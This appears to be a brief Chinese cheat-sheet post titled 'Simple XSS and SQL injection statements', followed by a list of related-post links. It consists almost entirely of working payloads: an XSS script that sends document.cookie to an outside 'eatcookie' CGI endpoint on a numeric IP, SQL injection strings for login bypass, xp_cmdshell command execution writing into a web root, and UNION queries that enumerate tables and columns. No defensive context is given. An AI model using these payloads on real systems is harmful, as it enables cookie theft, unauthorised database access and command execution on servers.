简单的XSS与SQL注入语句
跳转至恶意站点
<script>location.href="恶意站点URL"+document.cookie;</script> <script>location.href="http://192.179.175.218:81/cgi-bin/eatcookie.cgi?cookie="+document.cookie;</script>
数列数
select count(*) from employees where Login='user01'-- and Pass='user01'
执行命令
';exec master..xp_cmdshell 'echo "Hello \\ Every One 我是高铁侠" > c:\inetpub\wwwroot\temp\secure10_echo.txt' --
猜表名
' union select name, null, null, null, null, null, null, null from sysobjects where xtype='U' --
猜列名
' union select name from sysobjects where xtype='U' -- ' union select name from sysobjects where xtype='U'and name > 'Categories' -- ' union select name from syscolumns where id = OBJECT_ID('Employees') and name>'Address'-- ' union select EmployeeID from Employees --
相关推荐
ItBJLan 2020-06-11
sunlizhen 2020-04-10
sswqycbailong 2020-03-07
qshpeng 2020-03-06
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
明月清风精进不止 2020-06-13
godfather 2020-06-13
tanrong 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03